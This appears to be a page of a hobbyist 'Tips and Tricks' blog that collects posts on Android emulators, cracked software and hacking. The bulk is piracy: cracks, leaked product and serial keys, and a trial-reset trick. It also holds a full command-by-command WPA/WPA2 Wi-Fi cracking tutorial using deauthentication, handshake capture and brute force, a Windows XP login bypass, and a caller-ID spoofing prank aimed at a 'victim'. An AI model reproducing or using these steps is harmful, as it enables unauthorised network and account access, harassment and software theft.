All Posts
Showing posts with label Tips and Tricks. Show all posts
Showing posts with label Tips and Tricks. Show all posts

Install BlueStacks Without 2 Gb Ram



 ALL OF YOU HAVE HEARD OF A SOFTWARE NAMED BLUESTACKS  WHICH ALLOWS US TO RUN ANDROID APPS AND GAMES IN WINDOWS PC OR MAC OSX. THE BLUESTACKS APP PLAYER IS AVAILABLE FOR FREE AND IS RECOGNIZED AS THE BEST ANDROID EMULATOR IN THIS CATEGORY.BUT MANY OF US CANT INSTALL IT ON OUR PC DUE TO LOW GRAPHICS CARD OR RAM LESS THAN 2 GB.IN THIS POST I HAVE SHARED BLUESTACKS SOFTWARE WHICH WILL WORK EVEN IF YOU HAVE NO GRAPHICS CARD OR RAM LESS THAN 2 GB. I JUST USED A SOFTWARE NAMED ORCA AND EDITED THE BLUESTACKS SOFTWARE TO BE USED IN LOW END PC'S.




 STEPS TO RUN BLUESTACKS ON LOW END PC'S:

  • FIRST GO TO THE PROVIDED LINK AND DOWNLOAD BLUESTACKS:  Click Here To Download
  • AFTER DOWNLOADING, INSTALL THE SOFTWARE.
  • AT LAST MOMENT OF INSTALLATION IT WILL SHOW SOME ERRORS BUT WILL STILL WORK JUST CLICK ON OK.
  • ENJOY, BLUESTACKS HAS INSTALLED ON LESS THAN 2 GB RAM.

Run Android on PC


Here are some ways to Run Android on PC:


1. BlueStacks ------>     http://www.bluestacks.com/












Note that Playstore is NOT installed in BlueStacks, you have to install it your self.
Click Here to SEE HOW TO INSTALL.




2. Andy ------->     http://www.andyroid.net/



















I have used both of them, And if you ask me which is Better, I would go for Andy BUT you need to have a Good PC.
If you find Andy Lagging on your PC then use BlueStacks.
And if BlueStacks can't work on your PC because of LOW GRAPHICS CARD OR RAM LESS THAN 2 GB, then Click Here To See How To Make it Work.



Install Play Store on BlueStacks



I AM GOING TO SHARE YOU A TRICK WHICH WILL INSTALL GOOGLE PLAY SERVICES AND PLAY STORE APP ON YOUR BLUESTACKS. IT IS NOT VERY EASY TO INSTALL PLAY STORE ON BLUESTACKS. I DON'T KNOW WHY, BUT PLAY STORE IS NOT INSTALLED ON IT.GO THROUGH THE STEPS CORRECTLY AS I DO.


STEPS TO INSTALL PLAY STORE ON BLUESTACKS:-

  • FIRST DOWNLOAD THE FOLLOWING FILES WHICH ARE INCLUDED IN ONE FOLDER:      Click Here To Download
  • THEN INSTALL GOOGLE PLAY SERVICES AT FIRST.
  • AFTER THAT INSTALL ADW LAUNCHER
  • AND FINALLY INSTALL VENDING
  • OPEN BLUESTACKS AND CLICK ON HOME BUTTON
  • THEN CHECK Choose By Default For This Action AND SELECT ADW LAUNCHER.
  • THEN YOU CAN SEE THE PLAY STORE ICON IN HOME SCREEN BUT DON'T OPEN IT AS IT WILL ASK FOR GOOGLE ACCOUNT SIGN IN AND WHEN YOU LOG IN, IT WILL SHOW PROCESSING BUT WILL NOT SIGN IN.   
  • FOR THIS, HEAD TO SETTINGS > ACCOUNTS&SYNC > ADD ACCOUNT > GOOGLE.


















    NOW SIGN IN WITH YOUR GOOGLE ACCOUNT.
    YOU ARE ALL DONE, NOW OPEN GOOGLE PLAY STORE.

















          THEN CLICK ON CONTINUE.
          NOW, YOU HAVE YOUR GOOGLE PLAY ON BLUESTACKS.









How to hack wifi wpa/wpa2 password



Hack wifi password wpa/wpa2 using backtrack 5



If u got no idea what is backtrack 5 then i recommand u, to learn the basic things from youtube or google.....And if u still cannot get it, then comment or E-mail me the problem.


Rules to Follow


    • A Backtrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
    • here a link to download it http://www.backtrack-linux.org/downloads/
    • A nearby WEP-enabled Wi-Fi network 
    • Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.                                            


 Steps to Follow:

Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step 4 :

airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
           -w is the file to be written
           --bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step d :

airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download
crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download
pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install


tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install


Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the
wpacrack-01.cap, you should do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.


Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0

Make sure pyrit workable on your system :

pyrit list_cores
 

That's all! See you.
THANK YOU AND plz follow me in blog.............And if u have any confusion comment.. Or E-mail me....!!

How to hack/bypass windows XP login password



STEP 1;

SWITCH ON YOUR PC, UNTIL THE LOGIN SCREEN WILL APPEAR.










STEP 2;PRESS ( CTRL+ALT+DELETE ) BUTTON 3 TIMES UNTIL THIS SCREEN COMES., 
USER NAME ; ADMINISTRATOR
LEAVE THE PASSWORD BLANK, THEN HIT OK.








THATS ALL, IF YOU HAVE ANY CONFUSION LEAVE A COMMENT BELOW....   ;-)


Crack any version of Internet Download Manager (idm) manually


Internet Download Manager is the best download manager all we know using Internet Download Manager we can download youtube videos and many other web videos easily and the best thing about the Internet Download Manager is you can resume the pushed download link many time. But Internet Download Manager is premium software means its not free you can use it for a 30 days trial version and you have to buy the license. But I am using it without buying the license. So follow the simple steps to crack your Internet Download Manager manually.

Follow the simple steps to crack Internet Download Manager 

 

1.  Download the hosts file ; http://adf.ly/H3Rk3

2.  go to  C:\Windows\System32\drivers\etc and replace that old hosts file with new one.

3.  Now open IDM and go to registration > registration.

4. Now enter your name,email etc and add this key HUDWE-UO689-6D27B-YM28M and hit okay
and you have done ! after this your IDM will never ask for the serial key :)

If you have any query then feel free to ask ! make a comment.

How to customize CMD

How-To Customize Microsoft Command Prompt Colors

1)   Launch the Windows Command Prompt by Clicking the Windows Start Button and Typing Cmd then Pressing  Enter.
Windows Command Prompt Window 
2)   With the command Window Open, Click the CMD Icon on the top Left of the Window and Click Properties 
Customize Windows Command Prompt Window
3)   Under the Color Tab, Click Screen Text Bullet then Click a Color (I like a Black Background and Yellow or Green Text)
Customize Size and Color in Windows Command Prompt WindowPlay around with the colors until you find what you like.  Personally, I like the Blackground with Yellow or Green Text.  Another good scheme for old school geeks is a Green Background with Black Text.
Although the top of this How-To answers the question about color, next let me show you the next 2 things I always change when logging into a new Windows Machine for the first time – CMD Window Size, Buffer and Copy/Paste Edit Options.
How-To Customize Microsoft Command Prompt Size and Copy/Paste Options
4)   Click Layout Tab, Under Screen Buffer Size, Change the Height from 300 to 5000.  Under Window Size, Change Width from 80 to 120 and Height from 25 to 60
  • Customize Size and Color in Windows Command Prompt Window Screen Buffer Size – A larger buffer size allows you to scroll up and look through data which scrolls off the screen in your CMD Window.  This is VERY useful ALL the time when working in the CMD Window / Shell.
  • Windows Size – Not much to explain here.  These numbers work for me (19 inch Monitor running 1600 x 1200).  Play with the size until you find what works for you.
5)   Next, Click Options Tab and Check QuickEdit Mode Box under the Edit Options Heading.
Enable Quickedit mode in Windows Command Prompt Window
This will save you a LOT of time if you need to copy and paste text from both inside and out of the CMD Window.  For example, to COPY Text to your Clipboard from INSIDE the CMD Window, using your mouse Hold down your Left Mouse button and Drag / Highlight some text.  When all the text you want to copy is highlighted, release the mouse button and Right-Click your Mouse to copy the text to your Clipboard.  PASTE the text inside your CMD Window now by simply Right Clicking (CTRL V does not work inside the CMD Window).  You can also Paste the text inside a text editor like Word or Notepad using Right-Click Paste or CTRL-V.

RAR Password Unlocker v4.2 Full Version





RAR Password Unlocker is proved to be a helpful tool when you forgot WinRAR/RAR password and cannot open the RAR archives. It can remove RAR password at high speed via 3 attack options: Brute-force, Brute-force with user-defined Mask and Dictionary. By using advanced search algorithm, multiple-core CPUs etc, this RAR password recovery tool enables you enjoy faster recovery speed than other similar programs.

Key Features:

* Powerful Recovery Ability

Recover forgotten passwords from RAR archives encrypted by WinRAR 4.01 and its previous versions, no matter whether you encrypted file names or not.

* High Password Recovery Speed

- Recover forgotten RAR password at high speed, regardless of your encrypted RAR archive size.
- Support multi-core CPUs and SSE to accelerate password recovery process significantly. In the case of  multi-core CPU, the more CPU cores you have, the faster recovery speed you will enjoy.
- Program Priority is available to allocate more CPU power to RAR Password Unlocker and speed up the recovery speed efficiently.

* Three Efficient Recovery Options

- Brute-force Attack - Try all possible password combinations when you have no idea about it.
- Brute-force Attack with Mask - Greatly reduce the recovery time by specifying the forgotten password length, character set, etc. (High Recommended)
- Dictionary Attack – Recover lost RAR password by trying the password combinations in the built-in dictionary as a password. Self-created dictionary is also supported.

* Auto-save Recovery State

Automatically save the recovery state every 15 minutes by default so that you can resume the RAR password recovery process after the former interruption or stop. And the auto-save time interval can be changed as you wish.

* Extremely Easy and Safe Operation

With easy and intuitive interface, this enhanced RAR password recovery program allows you to easily and safely recover RAR password in 3 simple steps. No computer skills required and no any loss or damage to your RAR file. Moreover, it can automatically shut down your computer after recovery.


SCREENSHOTS:



BEFORE:


AFTER:





DOWNLOAD:






INSTRUCTIONS:



  1. Install the software located in "Setup" folder.
  2. Exit it from the taskbar.
  3. Run "REGISTRATION" located in "REG" folder.
  4. Click on Install button.
  5. Done.





ENJOY!!!

Windows 8 Release Preview 32Bit and 64Bit Full Version Includ. Product Key






Windows 8 Release Preview a released version of Windows 8, it’s Windows reimagined and reinvented. 
Windows 8 Release Preview It’s Windows re imagined and reinvented from a solid core of Windows 7 speed and reliability. It’s an all new touch interface. It’s a new Windows for new devices. And it’s easy to try now whether you’re installing it for the first time, or moving from Windows 8 Consumer Preview.
Powerful Features For Developers:


  • Get the tools you need to build Metro style apps for Windows 8. Our free download includes Microsoft Visual Studio Express 2012 for Windows 8 and Blend for Visual Studio to help jumpstart your app development project.
  • Our docs are optimized to make you more productive. Discover everything you need to plan, build, and sell great apps in the Windows Store.Windows 8 Release Preview has many powerful features for developers. Discover the new features for Desktop, Web, and Metro style app developers.
  • Dev Camps are free events that bring together developers like you to learn more about building apps. Learn interactively and get advice from expert app developers in hundreds of locations around the world.
  • The more apps you have, the better your experience. Apps can work together and share info, making it easier for you to do what you want.
  • There’s an app for everyone. Browse lists of top apps, view staff recommendations, and get personalized picks based on apps you already own. And access is easy the Store is built directly into Windows 8.
  • Now’s the time to build apps that’ll launch your business worldwide. Download free tools and samples, find design and code resources, and get expert help from Windows Dev Center.
SCREEN SHOTS:








Windows 8 System Requirement:
  • Processor= 1.4GHz (32Bit)
  • For 64Bit 1.8GHz
  • RAM= 1GB (32Bit)
  • For 2GB (64Bit)

DOWNLOAD:



Product Key:

TK8TP-9JN6P-7X7WW-RFFTV-B7QPF



ENJOY!!!

Kaspersky Antivirus 2013 Full Version Includ. License Key





Kaspersky Anti-Virus 2013 brings you the essential antivirus technologies that your PC needs – in a product that’s easy to download, install and run. Kaspersky Anti-Virus 2013 works behind-the-scenes – defending you and your PC against viruses, spyware, Trojans, rootkits and other threats… all without significant impact on your PC’s performance.

Kaspersky Antivirus 203 is capable not only to discover and remove threats on your computer, but also to protect your email client, instant messengers and web traffic, regardless of the browser.


Cloud is one of the core technologies in KAV 2013. The cloud-based Kaspersky Security Network gathers data from millions of participating users’ systems around the world to help defend you from the very latest viruses and malware attacks.

All the Potential threats are monitored and analyzed in real-time and dangerous actions are completely blocked before they can cause any harm.




FEATURES:

  • Protects against all viruses
  • Detects new, emerging and unknown threats
  • Identifies suspicious websites and phishing websites
  • Prevents malware from exploiting vulnerabilities on your PC
  • Automatic download and installation features
We all know that Microsoft will be releasing its new version of the OS and thus Kaspersky Antivirus 2013 is fully compatible with its latest operating system – Windows 8.
In addition, Kaspersky Now – a new application that has been developed to support Microsoft’s new user interface that lets you monitor your PC’s security status and launch vital security features.
KEY FEATURES:
System Watcher
Even if an unknown piece of malware manages to get onto your PC, Kaspersky’s unique System Watcher will detect dangerous behaviour and allow you to undo or rollback most malicious actions.
Better anti-phishing protection
A new anti-phishing engine improves your defenses against Internet fraudsters’ attempts to gain access to your personal information.
Automatic Exploit Prevention
Even if your PC and the applications running on it haven’t been updated with the latest fixes, Kaspersky Antivirus 2013 can prevent exploitation of vulnerabilities.
Optimised antivirus databases
With antivirus information provided from the cloud, Kaspersky has significantly reduced the size of the antivirus databases stored on your PC which helps to improve performance and reduce the time taken for installation and updates.
Reduced Battery Drain
When it’s installed on a laptop that is running on battery power, Kaspersky Antivirus 2013 automatically reduces its usage of resources to help increase the time the laptop can run before needing to be recharged.
Easy-to-use interface
The main interface window is optimized to help boost performance and ease of use for many popular user scenarios including launching scans and fixing problems.
Virtual Keyboard
Virtual Keyboard allows you to use mouse-clicks to enter your banking information online so your personal information can’t be tracked or stolen by keyloggers, hackers or identity thieves.
Gamer Mode
A special Gamer Mode ensures an uninterrupted game experience while still keeping you secure.
Compatible with Windows 8
In addition to being fully compatible with Windows 8, Kaspersky Antivirus 2013 includes features that provide even greater protection.

SCREEN SHOTS:








DOWNLOAD:


INSTRUCTIONS:

  1. Install Kaspersky Antivirus 2013
  2. In the next Window, you will be asked to enter the activation code.
  3. Enter the activation key given in "Kaspersky 2013 Key".
  4. Done.
ENJOY!!!

How to get back "Start" Button in Windows 8

The absence of “Start” button is the main reason, many people are avoiding Windows 8 Upgrade. Well, if you have already upgraded to Windows 8 and missing start Button like hell, here is the way to restore the Start button in Windows 8.
How to get back  Start Button in Windows 8?
Start8 by Stardock is a small utility that will put back the Start button in your Windows 8. It has a beautiful layout with support for search and one-click access to your My Documents, Pictures and other common folders.
Download: Start8 by Stardock | (free 30 day trial, Price: $4.99 )

How to Prank your Friends Mobile

To call someone from their own number or any number.
1. Go to http://www.mobivox.com and register there for free account.

2. During registration, remember to insert Victim mobile number in "Phone number
"field as shown below.



3. Complete registration and confirm your email id and then login to your account.
click on "Direct WebCall".



4. You will arrive at page shown below. In "Enter a number" box, select your country
and also any mobile number(you can enter yours). Now, simply hit on "Call Now"
 button to call your friend with his own number.



5. That's it. Your friend will be shocked to see his own number calling him. I have
spent last two days simply playing this cool mobile hack prank.

Note: This trick will only knowledge purpose...
         Just try this trick only known person.

How to Crack any software and run the trial version forever

Are you using any trial version software which is just too awesome but nearing its expiry and unable to find ways to crack it?
trial Crack any software and run the trial version forever?
Here is a trick to crack any software and run the trial version forever just in a couple of minutes.
Before starting with the crack you should know how these trial version software are programmed. These software’s always comes with 1 month trial period after which they will expire. When these software’s are installed for the first time they make an entry of Installation Date, Time etc. in the Windows Registry. Whenever we run these software’s they compare the current system date and time with the installation date and time. Thus they make out whether the trial period is expired or not.
Manually changing the system date and time to an earlier date and time will not be the right solution. To over come this there is a simple tool “RunAsDate v1.11” which can be used.
RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date and time of your computer, but it only injects the date/time that you specify into the desired application.
Tips to Follow:
-  Download this utility and have it ready all time
-  As soon as you install any trial version software just note down the date and time of installation
-  Inject the expiry date and time in the RunAsDate tool. It is always safe you put in a date which is prior to your expiry date
runasdate Crack any software and run the trial version forever?
-  After expiry always run the such software’s using the RunAsDate tool. Thus the trial version software will run forever!!!
Note: After expiry don’t run such software’s directly else the crack will no longer work.
Download: RunAsDate

I hope this trick would be of great help for most of us… Try it out and put in your comments!!!

Download Norton Internet Security 2012 with crack for 50 years

In today’s world we always have to beware form Malwares, Trojans, Virus, Worms.So i have come here to tell you about the Norton internet security
Norton has developed a new version of Antivirus.
 It delivers protection from online dangers without sacrificing performance.
You can download crack version from here for 50 years.
The new things in version 2012:
  • Customizable Control Center gives you the option to choose your preference between a simplified screen or the traditional detailed view.
  • Identity Safe alerts have moved to the Norton Toolbar so there are less interruptions while you are online – but your passwords are still as secure as ever.
  • Bandwidth Management limits Norton’s processes and updates when you have limited bandwidth or monthly downloads
  • Download Insight 2.0 now tells you how stable a download is before you put your computer at risk for crashes or other bad things to happen
  • Norton Recovery Tools help remove threats that can be deeply buried in a PC’s operating system 
Download Norton security now:          Download Here
Download crack:                                    Download Crack